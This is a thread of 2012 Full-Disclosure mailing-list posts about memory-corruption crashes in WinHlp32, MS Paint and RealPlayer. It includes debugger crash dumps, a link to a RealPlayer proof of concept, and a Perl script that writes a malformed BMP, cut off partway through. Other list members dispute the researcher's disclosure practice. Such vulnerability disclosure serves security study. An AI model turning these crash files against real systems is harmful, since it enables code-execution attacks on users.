are not near NULL are exploitable. Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Normal way of doing security research business (for normal people of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well-known. Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list posts. Or both. Mikhail utin, CISSP -Original Message- Today's Topics: 1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami) 2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami) ** Hello list! I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption Best Regards Kaveh Ghaemmaghami aka (coolkaveh) _ CONFIDENTIALITY NOTICE: This email communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please reply to the sender immediately or by telephone at (617) 426-0600 and destroy all copies of this communication and any attachments. For further information regarding Commonwealth Care Alliance's privacy policy, please visit our Internet web site at http://www.commonwealthcare.org. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Dont feed the trolls ! On Tue, Oct 30, 2012 at 11:21 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote: Normal way of doing security research business (for normal people of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well-known. Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list posts. Or both. Mikhail utin, CISSP -Original Message- Today's Topics: 1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami) 2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami) ** Hello list! I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption Best Regards Kaveh Ghaemmaghami aka (coolkaveh) _ CONFIDENTIALITY NOTICE: This email communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please reply to the sender immediately or by telephone at (617) 426-0600 and destroy all copies of this communication and any attachments. For further information regarding Commonwealth Care Alliance's privacy policy, please visit our Internet web site at http://www.commonwealthcare.org. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Or do, and grab a bag of popcorn ;) On Tue, Oct 30, 2012 at 4:29 PM, Peter Dawson slash...@gmail.com wrote: Dont feed the trolls ! On Tue, Oct 30, 2012 at 11:21 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote: Normal way of doing security research business (for normal people of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well-known. Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list posts. Or both. Mikhail utin, CISSP -Original Message- Today's Topics: 1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami) 2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami) ** Hello list! I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption Best Regards Kaveh Ghaemmaghami aka (coolkaveh) _ CONFIDENTIALITY NOTICE: This email communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please reply to the sender immediately or by telephone at (617) 426-0600 and destroy all copies of this communication and any attachments. For further information regarding Commonwealth Care Alliance's privacy policy, please visit our Internet web site at http://www.commonwealthcare.org. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows Help program (WinHlp32.exe) memory corruption
I was looking and appear that this bug was fixed a long time ago at ms, No, the bugs remain. However... also windows help (.hlp) do not appear to be automatic opened in windows vista and later. That's the point - hlp is such an unsafe file format that the winhlp32.exe was *removed* from Vista. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
Antony if u wanna do my home work i suggest you to find the offset where cause the crash change some byte and play with come back when there is not second chance ,instruction is not valid and it references not valid data. Irrespective of the cause of the invalid access, the exception is *handled* by Paint. There is no crash. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
Antony go do ur home work On Tue, Oct 30, 2012 at 1:07 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello List i want to warn u about RealPlayer 15.0.6.14 memory corruption during the handling of the 3g2 files look what awesome coolkaveh found Lets kill that bug Be safe keep it priv8 Title: RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability Version : 15.0.6.14 Date : 2012-10-29 Vendor : http://www.real.com/ crash: http://img543.imageshack.us/img543/9130/pocm.jpg Impact : High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested : windows 7 x64 Author : coolkaveh ### Bug : Memory corruption during the handling of the 3g2 files context-dependent Successful exploits can allow attackers to execute arbitrary code (f84.8c8): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=040d1370 ebx=7fdfe2d0 ecx=0a67f798 edx=0a67f7a8 esi= edi=0004 eip=66fc94df esp=3c6c1a80 ebp=0a67f764 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Real\RealPlayer\codecs\dmp4.dll - dmp4!GetGUID+0x1836f: 66fc94df 8944241cmov dword ptr [esp+1Ch],eax ss:002b:3c6c1a9c= 0:029 !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x3c6c1a9c First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC005) Exception Sub-Type: Write Access Violation Exception Hash (Major/Minor): 0x247c7f22.0x247c7f63 Stack Trace: dmp4!GetGUID+0x1836f Instruction Address: 0x66fc94df Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at dmp4!GetGUID+0x0001836f (Hash=0x247c7f22.0x247c7f63) User mode write access violations that are not near NULL are exploitable. Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
defective software is OK leave it i am just going to press g if is handled its ok not even changing some byte and analyze On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello list! I want to warn you about Microsoft Paint 5.1 memory corruption Be safe Kaveh Ghaemmaghami aka (coolkaveh) -- #!/usr/bin/perl #Title: Microsoft Paint 5.1 memory corruption #Version : build 2600.xpsp Service Pack3 #Date : 2012-10-21 #Vendor : http://www.microsoft.com #Impact : Med/High #Contact : coolkaveh [at] rocketmail.com #Twitter : @coolkaveh #tested : XP SP3 ENG #Author : coolkaveh ### #Notice : for testing POC please run the Microsoft Pain under a debugger and then open the POC file. # #Bug : # #Memory corruption during the handling of the bmp files a context-dependent attacker can execute arbitrary code. ### #(844.cc4): Break instruction exception - code 8003 (first chance) #eax=7ffda000 ebx=0001 ecx=0002 edx=0003 esi=0004 edi=0005 #eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs= efl=0246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - #ntdll!DbgBreakPoint: #7c90120e cc int 3 #0:005 g #(844.e20): Access violation - code c005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=000cab68 ebx= ecx=0276 edx=09d8 esi=000d5589 edi=000cab68 #eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0 nv up ei pl nz na po nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\GDI32.dll - #GDI32!DdEntry11+0x44: #77f2f118 f3a5rep movs dword ptr es:[edi],dword ptr [esi] #0:000 k #*** ERROR: Module load completed but symbols could not be loaded for C:\WINDOWS\system32\mspaint.exe #ChildEBP RetAddr #WARNING: Stack unwind information not available. Following frames may be wrong. #0007efb0 0101235e GDI32!DdEntry11+0x44 #0007f024 0100a666 mspaint+0x1235e #0007f04c 0102284e mspaint+0xa666 #0007f07c 01022af6 mspaint+0x2284e #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\MFC42u.DLL - #0007f100 5f801bc5 mspaint+0x22af6 #0007f120 5f801b36 MFC42u!Ordinal6370+0x22 #0007f180 5f802f6c MFC42u!Ordinal1108+0x91 #0007f1a4 5f810971 MFC42u!Ordinal5801+0x34 #0007f210 5f81424a MFC42u!Ordinal3944+0x5b #0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d #0007f2b4 7c9101bb ntdll!wcsncpy+0xb07 #0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117 #0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e #0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e #0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7 #0007f300 ntdll!RtlAllocateHeap+0x117 # my $poc = \x42\x4D\x4E\x0A\x00\x00\x00\x00\x00\x00\xC7\xBD\x00\x00\x28\x00\x00\x00\x46\x00\x00\x00\x46\x00\x00. \x00\x01\x00\x04\x00\x00\x00\x00\x00\xD8\x09\x00\x00\xC4\x0E\x00\x00\xC4\x0E\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80. \x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xC0\xC0\xC0\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF. \xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x88\x88\x88\x88\x88\x88\x88. \x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x88\x87\x78\x88\x88\x88\x88\x87\x88\x88\x88\x88\x88. \x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\x88\x88\x88\x88\x88\xFF\x87\x70\x77\x71. \x77\x77\x77\x77\x77\x72\x78\x88\x77\x07\x88\x77\x77\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF. \xFF\xFF\xFF\xFF\x88\x8F\xF8\xFF\xFF\x7F\xFF\xF7\x8F\x07\xF7\x8F\xF8\x07\x88\xFF\xF0\x78\xFF\x87\x77. \x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\x88\xFF\x88\x8F\xFF\xFF\x8F\xF8\x87\x8F\x7F. \xF7\xFF\x8F\x80\x8F\xFF\xF7\x8F\xF8\xFF\x07\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xF8. \x8F\xF8\x88\x8F\xFF\x77\x8F\xF8\x84\x8F\xFF\xF7\xFF\x08\xF7\xFF\x7F\xF7\xFF\x47\x8F\x76\x00\x88\x88. \x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x8F\x88\x88\x8F\xFF\x77\x8F\xFF\xF7\x8F\xFF\xF7\xFF\x08. \xF7\xF8\x0F\xF7\xF8\x07\x7F\x77\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xF8\x88\x88.